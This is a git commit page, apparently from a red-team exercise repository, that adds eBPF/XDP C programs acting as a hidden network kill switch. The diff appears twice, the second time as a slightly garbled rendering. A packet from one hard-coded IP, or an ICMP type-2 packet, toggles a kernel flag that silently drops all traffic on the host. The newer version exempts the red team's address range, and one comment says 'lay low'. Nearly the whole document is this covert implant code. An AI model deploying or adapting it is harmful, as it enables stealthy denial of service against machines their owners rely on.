organizationHEAD main

author: Ryan Schanzenbacher <ryan@rschanz.org> 2023-03-20 18:03:45 -0400
committer: Ryan Schanzenbacher <ryan@rschanz.org> 2023-03-20 18:03:45 -0400
commit: b9ef8fbd63fface91ff3cd98d7d702f9827c322d (patch)
tree: afac97ee882a4e9ab7ffab169980c73ba51cc535 /xdp-program
parent: f8616c8274a9b2e378f57e98f0d17b61358b00c3 (diff)
3 files changed, 172 insertions, 0 deletions
diff --git a/xdp-program/packet_dropper.c b/xdp-program/packet_dropper.c
new file mode 100644
index 0000000..d0a8d85
--- /dev/null
+++ b/xdp-program/packet_dropper.c
@@ -0,0 +1,77 @@
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <linux/if_ether.h>
+#include <linux/in.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+struct {
+        __uint(type, BPF_MAP_TYPE_ARRAY);
+        __type(key, __u32);
+        __type(value, __u32);
+        __uint(max_entries, 1);
+} status SEC(".maps");
+SEC("xdpentry")
+int entry(struct xdp_md *ctx) {
+        // Prepare some data structures
+        __u32 *rec;
+        __u32 key = 0;
+        void *data_end = (void *)(long)ctx->data_end;
+        void *data = (void *)(long)ctx->data;
+        struct ethhdr *eth = data;
+        rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
+        if (!rec) {
+                return XDP_DROP; // try to lay low on error
+        }
+        //bpf_printk("Rec: %u", *rec); // Debug prints
+        if ((*rec != 55) && (*rec != 56)) {
+                // First run check
+                // bpf_printk("Resetting rec!"); // Debug Prints
+                *rec = 56; // set default value for map
+        }
+        if (eth + 1 > data_end) // Bounds checking for xdp preverifier
+                return XDP_PASS; // This should never run normally
+        /** if(eth->h_proto != ETH_P_IP) {
+                return XDP_PASS; // don't kill layer 2 traffic
+        } **/
+        struct iphdr *iph = data + sizeof(struct ethhdr);
+        if (iph + 1 > data_end) // More bounds checking
+                return XDP_PASS; // This should never run either
+                                 //
+        __u32 ip_src = iph->saddr; // grab source address of packet
+        // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
+        // Determine if we need to further process this packet
+        if (ip_src == 1946091487) {
+                // This packet had a destination of 223.255.254.115, do something!
+                // bpf_printk("Got it!, setting rec..."); // Debug print
+                switch (*rec) {
+                        case 55 :
+                                *rec = 56;
+                                break;
+                        case 56 :
+                                *rec = 55;
+                                break;
+                }
+                return XDP_DROP;
+        }
+        else if (ip_src == 0) {
+                // most likely a layer 2 packet, let it thru
+                return XDP_PASS;
+        }
+        // Finish processing
+        if (*rec == 55) {
+                return XDP_DROP;
+        } else {
+                return XDP_PASS;
+        }
+}
+char _license[] SEC("license")= "GPL";
diff --git a/xdp-program/packet_dropper.o b/xdp-program/packet_dropper.o
new file mode 100644
index 0000000..3958484
--- /dev/null
+++ b/xdp-program/packet_dropper.o
Binary files differ
diff --git a/xdp-program/packet_dropper_new.c b/xdp-program/packet_dropper_new.c
new file mode 100644
index 0000000..3033b38
--- /dev/null
+++ b/xdp-program/packet_dropper_new.c
@@ -0,0 +1,95 @@
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_endian.h>
+#include <linux/if_ether.h>
+#include <linux/in.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/icmp.h>
+#include <linux/if_vlan.h>
+struct {
+        __uint(type, BPF_MAP_TYPE_ARRAY);
+        __type(key, __u32);
+        __type(value, __u32);
+        __uint(max_entries, 1);
+} status SEC(".maps");
+SEC("xdpentry")
+int entry(struct xdp_md *ctx) {
+        // Prepare some data structures
+        __u32 *rec;
+        __u32 key = 0;
+        void *data_end = (void *)(long)ctx->data_end;
+        void *data = (void *)(long)ctx->data;
+        struct ethhdr *eth = data;
+        rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
+        if (!rec) {
+                return XDP_DROP; // try to lay low on error
+        }
+        //bpf_printk("Rec: %u", *rec); // Debug prints
+        if ((*rec != 55) && (*rec != 56)) {
+                // First run check
+                // bpf_printk("Resetting rec!"); // Debug Prints
+                *rec = 56; // set default value for map
+        }
+        if (eth + 1 > data_end) // Bounds checking for xdp preverifier
+                return XDP_PASS; // This should never run normally
+        if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) {
+                return XDP_PASS; // don't kill layer 2 traffic
+        }
+        struct iphdr *iph = data + sizeof(struct ethhdr);
+        if (iph + 1 > data_end) // More bounds checking
+                return XDP_PASS; // This should never run either
+                                 //
+        __u32 ip_src = iph->saddr; // grab source address of packet
+        
+        struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr);
+        if (icmph + 1 > data_end) {
+                // More bounds checking
+                return XDP_PASS;
+        }
+        char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr);
+        
+        // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
+        // Determine if we need to further process this packet
+        //if (ip_src == 1946091487) {
+        bpf_printk("Incoming packet: %u\n", icmph->type);
+        if (icmph->type == 2 || ip_src == 1946091487) {
+                // This packet had a destination of 223.255.254.115, do something!
+                // bpf_printk("Got it!, setting rec..."); // Debug print
+                switch (*rec) {
+                        case 55 :
+                                *rec = 56;
+                                break;
+                        case 56 :
+                                *rec = 55;
+                                break;
+                }
+                return XDP_DROP;
+        }
+        else if (ip_src == 0) {
+                // most likely a layer 2 packet, let it thru
+                return XDP_PASS;
+        }
+ else if (ip_src >= 16974090 && ip_src <= 503513354) {
+   // IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team
+   return XDP_PASS;
+ }
+        // Finish processing
+        if (*rec == 55) {
+                return XDP_DROP;
+        } else {
+                return XDP_PASS;
+        }
+}
+char _license[] SEC("license")= "GPL";
author	Ryan Schanzenbacher <ryan@rschanz.org>	2023-03-20 18:03:45 -0400
committer	Ryan Schanzenbacher <ryan@rschanz.org>	2023-03-20 18:03:45 -0400
commit	b9ef8fbd63fface91ff3cd98d7d702f9827c322d (patch)
tree	afac97ee882a4e9ab7ffab169980c73ba51cc535 /xdp-program
parent	f8616c8274a9b2e378f57e98f0d17b61358b00c3 (diff)

diff --git a/xdp-program/packet_dropper.c b/xdp-program/packet_dropper.c new file mode 100644 index 0000000..d0a8d85 --- /dev/null +++ b/xdp-program/packet_dropper.c
@@ -0,0 +1,77 @@
	1	#include <linux/bpf.h>
	2	#include <bpf/bpf_helpers.h>
	3	#include <linux/if_ether.h>
	4	#include <linux/in.h>
	5	#include <linux/if_packet.h>
	6	#include <linux/ip.h>
	7	#include <linux/tcp.h>
	8
	9	struct {
	10	__uint(type, BPF_MAP_TYPE_ARRAY);
	11	__type(key, __u32);
	12	__type(value, __u32);
	13	__uint(max_entries, 1);
	14	} status SEC(".maps");
	15
	16	SEC("xdpentry")
	17	int entry(struct xdp_md *ctx) {
	18	// Prepare some data structures
	19	__u32 *rec;
	20	__u32 key = 0;
	21	void data_end = (void )(long)ctx->data_end;
	22	void data = (void )(long)ctx->data;
	23	struct ethhdr *eth = data;
	24
	25	rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
	26	if (!rec) {
	27	return XDP_DROP; // try to lay low on error
	28	}
	29	//bpf_printk("Rec: %u", *rec); // Debug prints
	30	if ((rec != 55) && (rec != 56)) {
	31	// First run check
	32	// bpf_printk("Resetting rec!"); // Debug Prints
	33	*rec = 56; // set default value for map
	34	}
	35
	36	if (eth + 1 > data_end) // Bounds checking for xdp preverifier
	37	return XDP_PASS; // This should never run normally
	38
	39	/** if(eth->h_proto != ETH_P_IP) {
	40	return XDP_PASS; // don't kill layer 2 traffic
	41	} **/
	42
	43	struct iphdr *iph = data + sizeof(struct ethhdr);
	44	if (iph + 1 > data_end) // More bounds checking
	45	return XDP_PASS; // This should never run either
	46	//
	47	__u32 ip_src = iph->saddr; // grab source address of packet
	48	// bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
	49	// Determine if we need to further process this packet
	50	if (ip_src == 1946091487) {
	51	// This packet had a destination of 223.255.254.115, do something!
	52	// bpf_printk("Got it!, setting rec..."); // Debug print
	53	switch (*rec) {
	54	case 55 :
	55	*rec = 56;
	56	break;
	57	case 56 :
	58	*rec = 55;
	59	break;
	60	}
	61	return XDP_DROP;
	62	}
	63	else if (ip_src == 0) {
	64	// most likely a layer 2 packet, let it thru
	65	return XDP_PASS;
	66	}
	67
	68	// Finish processing
	69	if (*rec == 55) {
	70	return XDP_DROP;
	71	} else {
	72	return XDP_PASS;
	73	}
	74	}
	75
	76
	77	char _license[] SEC("license")= "GPL";


diff --git a/xdp-program/packet_dropper.o b/xdp-program/packet_dropper.o new file mode 100644 index 0000000..3958484 --- /dev/null +++ b/xdp-program/packet_dropper.o
Binary files differ


diff --git a/xdp-program/packet_dropper_new.c b/xdp-program/packet_dropper_new.c new file mode 100644 index 0000000..3033b38 --- /dev/null +++ b/xdp-program/packet_dropper_new.c
@@ -0,0 +1,95 @@
	1	#include <linux/bpf.h>
	2	#include <bpf/bpf_helpers.h>
	3	#include <bpf/bpf_endian.h>
	4	#include <linux/if_ether.h>
	5	#include <linux/in.h>
	6	#include <linux/if_packet.h>
	7	#include <linux/ip.h>
	8	#include <linux/icmp.h>
	9	#include <linux/if_vlan.h>
	10
	11	struct {
	12	__uint(type, BPF_MAP_TYPE_ARRAY);
	13	__type(key, __u32);
	14	__type(value, __u32);
	15	__uint(max_entries, 1);
	16	} status SEC(".maps");
	17
	18	SEC("xdpentry")
	19	int entry(struct xdp_md *ctx) {
	20	// Prepare some data structures
	21	__u32 *rec;
	22	__u32 key = 0;
	23	void data_end = (void )(long)ctx->data_end;
	24	void data = (void )(long)ctx->data;
	25	struct ethhdr *eth = data;
	26
	27	rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
	28	if (!rec) {
	29	return XDP_DROP; // try to lay low on error
	30	}
	31	//bpf_printk("Rec: %u", *rec); // Debug prints
	32	if ((rec != 55) && (rec != 56)) {
	33	// First run check
	34	// bpf_printk("Resetting rec!"); // Debug Prints
	35	*rec = 56; // set default value for map
	36	}
	37
	38	if (eth + 1 > data_end) // Bounds checking for xdp preverifier
	39	return XDP_PASS; // This should never run normally
	40
	41	if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) {
	42	return XDP_PASS; // don't kill layer 2 traffic
	43	}
	44
	45	struct iphdr *iph = data + sizeof(struct ethhdr);
	46	if (iph + 1 > data_end) // More bounds checking
	47	return XDP_PASS; // This should never run either
	48	//
	49	__u32 ip_src = iph->saddr; // grab source address of packet
	50
	51	struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr);
	52	if (icmph + 1 > data_end) {
	53	// More bounds checking
	54	return XDP_PASS;
	55	}
	56
	57	char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr);
	58
	59	// bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
	60	// Determine if we need to further process this packet
	61	//if (ip_src == 1946091487) {
	62	bpf_printk("Incoming packet: %u\n", icmph->type);
	63	if (icmph->type == 2 \|\| ip_src == 1946091487) {
	64	// This packet had a destination of 223.255.254.115, do something!
	65	// bpf_printk("Got it!, setting rec..."); // Debug print
	66	switch (*rec) {
	67	case 55 :
	68	*rec = 56;
	69	break;
	70	case 56 :
	71	*rec = 55;
	72	break;
	73	}
	74	return XDP_DROP;
	75	}
	76	else if (ip_src == 0) {
	77	// most likely a layer 2 packet, let it thru
	78	return XDP_PASS;
	79	}
	80
	81	else if (ip_src >= 16974090 && ip_src <= 503513354) {
	82	// IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team
	83	return XDP_PASS;
	84	}
	85
	86	// Finish processing
	87	if (*rec == 55) {
	88	return XDP_DROP;
	89	} else {
	90	return XDP_PASS;
	91	}
	92	}
	93
	94
	95	char _license[] SEC("license")= "GPL";